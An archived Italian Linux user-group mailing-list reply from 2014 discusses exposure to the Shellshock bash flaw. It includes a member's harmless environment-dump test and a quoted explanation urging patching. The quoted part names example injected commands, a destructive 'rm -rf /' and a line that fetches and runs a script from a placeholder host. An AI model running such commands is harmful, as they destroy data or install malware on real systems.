Re: [linux_var] shellshock quali sw a rischio ?

To: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Subject: Re: [linux_var] shellshock quali sw a rischio ?

From: Giovanni Orlandi <orlangio@gmail.com>

Date: Mon, 29 Sep 2014 12:26:08 +0200

Authentication-results: linuxvar.it; dkim=pass reason="2048-bit key; insecure key" header.d=gmail.com header.i=@gmail.com header.b=RcJA9rRg; dkim-adsp=pass; dkim-atps=neutral

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=ml.linuxvar.it; s=mail; t=1411986318; bh=Lh2zrvHoyvMEh9QhFbI3yoSsdzZO/1dvj7bJPbzq4hc=; h=In-Reply-To:References:Date:From:To:Subject:Reply-To:List-Id: List-Unsubscribe:List-Archive:List-Post:List-Help:List-Subscribe; z=In-Reply-To:=20<20140926223355.a3e00c0a9ff3f48dbd621f0a@tiscali.i t>|References:=20<CAGod1SBAZ9Htw0MF=3DnRQjV_DpE17k0s00q-AejAW=3DGY KF2nByg@mail.gmail.com>=0D=0A=20<CAPsbc0LpnY54+S+6+MZ65UnPHJV4Nx4d WkaM5uP9dGqz37x3LA@mail.gmail.com>=0D=0A=20<20140926223355.a3e00c0 a9ff3f48dbd621f0a@tiscali.it>|Date:=20Mon,=2029=20Sep=202014=2012: 26:08=20+0200|From:=20Giovanni=20Orlandi=20<orlangio@gmail.com>|To :=20linux_var=20-=20LUG=20di=20Varese=20e=20Provincia=20Mailing=20 List=20<talking@ml.linuxvar.it>|Subject:=20Re:=20[linux_var]=20she llshock=20quali=20sw=20a=20rischio=20?|Reply-To:=20linux_var=20-=2 0LUG=20di=20Varese=20e=20Provincia=20Mailing=20List=0D=0A=20<talki ng@ml.linuxvar.it>|List-Id:=20linux_var=20-=20LUG=20di=20Varese=20 e=20Provincia=20Mailing=20List=0D=0A=20<talking.ml.linuxvar.it>|Li st-Unsubscribe:=20<http://ml.linuxvar.it/cgi-bin/mailman/options/t alking>,=0D=0A=20<mailto:talking-request@ml.linuxvar.it?subject=3D unsubscribe>|List-Archive:=20<http://ml.linuxvar.it/pipermail/talk ing/>|List-Post:=20<mailto:talking@ml.linuxvar.it>|List-Help:=20<m ailto:talking-request@ml.linuxvar.it?subject=3Dhelp>|List-Subscrib e:=20<http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>,=0D= 0A=20<mailto:talking-request@ml.linuxvar.it?subject=3Dsubscribe>; b=ttIwqjscqIP1tCa4QpkSveLMpgO3jXXtPVKNYquLJzXSsMUZni2K95Z7kgIvqG3iC Gy34l+ns9fVD05EclIqeP6uWUZFVw5tH2Ruuh/dWFOZLFWBOQvD76mxt0lIUqtR1aw TX01GdAot+81N+Q/A1vCj4evExvDlPWPDg9w2yHg=

Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20120113; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type; bh=B/fugdrSQyzHmr8H5H4crKjUJnc0IWN7PBStzJ1bfSI=; b=RcJA9rRgEQS8WmJTeTZSF3e2awXPNbw+D+OvZQhPoQEblX9hwmhSImSAZltHrgO7B4 m6iRl9DiMn2+4tmV9BCpcfpMkwtcqJ0j4CksVOMn7gNG71B1vBC+G5w3OPVGkCPm0LoY DtIQUcEgeAbs5aW5jM3utIEW0ha5DouaO6t1/JLXGHcnAyQnitV85NirSiuBJIwX2MRR 6wJwSGXI6nMjSamNoHL/K+O9NgIiWSB9S46KXOpd3IPoVQrpWkuf3FtNkL8MndvPr+sM HbMp22rrAffdJ8u0RZF0t3cgnoKrUXuq7G3W2VsQaysJ1v9rcdWp+zuQkfpPaF8ieJ1N CRWQ==

In-reply-to: <20140926223355.a3e00c0a9ff3f48dbd621f0a@tiscali.it>

List-archive: <http://ml.linuxvar.it/pipermail/talking/>

List-help: <mailto:talking-request@ml.linuxvar.it?subject=help>

List-id: linux_var - LUG di Varese e Provincia Mailing List <talking.ml.linuxvar.it>

List-post: <mailto:talking@ml.linuxvar.it>

List-subscribe: <http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking>, <mailto:talking-request@ml.linuxvar.it?subject=subscribe>

List-unsubscribe: <http://ml.linuxvar.it/cgi-bin/mailman/options/talking>, <mailto:talking-request@ml.linuxvar.it?subject=unsubscribe>

References: <CAGod1SBAZ9Htw0MF=nRQjV_DpE17k0s00q-AejAW=GYKF2nByg@mail.gmail.com> <CAPsbc0LpnY54+S+6+MZ65UnPHJV4Nx4dWkaM5uP9dGqz37x3LA@mail.gmail.com> <20140926223355.a3e00c0a9ff3f48dbd621f0a@tiscali.it>

Reply-to: linux_var - LUG di Varese e Provincia Mailing List <talking@ml.linuxvar.it>

Sender: "Talking" <talking-bounces@ml.linuxvar.it>

Ciao,

ho fatto un semplice test sul mio sito ed eseguendo la system da PHP non vengono passate le variabili di ambiente di default,

ho lanciato: http://h.settebello.info/testme.php?param=EMERGENZAEMERGENZAEMERGENZA

allego programmini di test e risultato... quindi ad occhio sono tranquillo
mentre, ma quello che (per me) era ovvio già da prima, se volessi passare

il contenuto di "param" allo script dovrei fare un corretto checking del contenuto...

root@vmi23215:~# cat /var/www/default/testme.php
<?php

system( "/usr/local/bin/testme.sh" ) ;

root@vmi23215:~# cat /usr/local/bin/testme.sh
#!/bin/bash

set > /tmp/test.me

root@vmi23215:~# cat /var/www/default/testme.php
<?php

system( "/usr/local/bin/testme.sh" ) ;

root@vmi23215:~# cat /usr/local/bin/testme.sh
#!/bin/bash

set > /tmp/test.me

root@vmi23215:~# cat /tmp/test.me
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_LOG_DIR=/var/log/apache2
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_DIR=/var/run/apache2
APACHE_RUN_GROUP=www-data
APACHE_RUN_USER=www-data
BASH=/bin/bash
BASHOPTS=cmdhist:extquote:force_fignore:hostcomplete:interactive_comments:progcomp:promptvars:sourcepath
BASH_ALIASES=()
BASH_ARGC=()
BASH_ARGV=()
BASH_CMDS=()
BASH_LINENO=([0]="0")
BASH_SOURCE=([0]="/usr/local/bin/testme.sh")
BASH_VERSINFO=([0]="4" [1]="2" [2]="37" [3]="1" [4]="release" [5]="x86_64-pc-linux-gnu")
BASH_VERSION='4.2.37(1)-release'
DIRSTACK=()
EUID=33
GROUPS=()
HOSTNAME=vmi23215.contabo.net
HOSTTYPE=x86_64
IFS=$' \t\n'
LANG=C
MACHTYPE=x86_64-pc-linux-gnu
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/bin:/usr/bin:/bin
PPID=31288
PS4='+ '
PWD=/var/www/default
SHELL=/bin/sh
SHELLOPTS=braceexpand:hashall:interactive-comments
SHLVL=1
TERM=dumb
UID=33
_=/bin/bash

Il giorno 26 settembre 2014 22:33, Diego Roversi <diegor@tiscali.it> ha scritto:

On Fri, 26 Sep 2014 12:54:36 +0200
Lorenzo Lobba <lorenzo.lobba@gmail.com> wrote:

> Allora. Sono a rischio le CGI che usano bash (ksh, dash &C sono
> immuni) e potenzialmente quelle si basano su Perl e tramite "system"
> fanno una chiamata a una funzione bash.

Se fanno una system SONO vulnerabili, se bash e' la shell dell'utente. Quando tu lanci system('/usr/bin/ps') in realta' viene fatto un fork + exec /bin/sh -c /usr/bin/ps e quindi sei fregato.

La cosa e' subdola perche' non e' necessario che sia il cgi-bin a chiamare una bash, ma un qualsiasi sottoprocesso (o un sotto-sotto-processo).

> Inviando alla bash tramite variabili alcune stringe di caratteri, si
> possono eseguire in remoto comandi sul server.
> Da quanto ho capito si possono solo dare comandi di lettura. Il
> rischio è che le informazioni carpite possano essere poi usate per
> sfruttare altre vulnerabilità.

Nein. Qualsiasi comando puo' essere chiamato. Compreso "rm -rf /". Oppure "wget http://sito/malware.sh; ./malware.sh".

Se usate debian o derivate, al 90% vi salvate, perche' la shell di default per gli script e' /bin/dash. Ma nel dubbio farei *subito* un aggiornamento. Le patch per questa vulnerabilita' sono gia' presenti nelle vostre distro di fiducia.

La cosa piu' inquietante, che oltre ai cgi-bin, potrebbero bucarvi il portatile, se vi collegate ad una rete con un dhcp "malevolo". Spero di aver reso l'idea della gravita'.

--
Diego Roversi <diegor@tiscali.it>

_______________________________________________
Talking mailing list
Talking@ml.linuxvar.it
http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking

--
-----------------------------------------------------------------------------------------
Luca 18,5 : "Poiché questa vedova è così molesta le farò giustizia, perché non venga continuamente a importunarmi".
Neemia 8,10 : "...questo giorno è consacrato al nostro Signore; non siate tristi; perché la gioia del Signore è la vostra forza".
GSM 345.6050488 / 327.0547392 / 392.0698126 - Fax 06.62204735

_______________________________________________ Talking mailing list Talking@ml.linuxvar.it http://ml.linuxvar.it/cgi-bin/mailman/listinfo/talking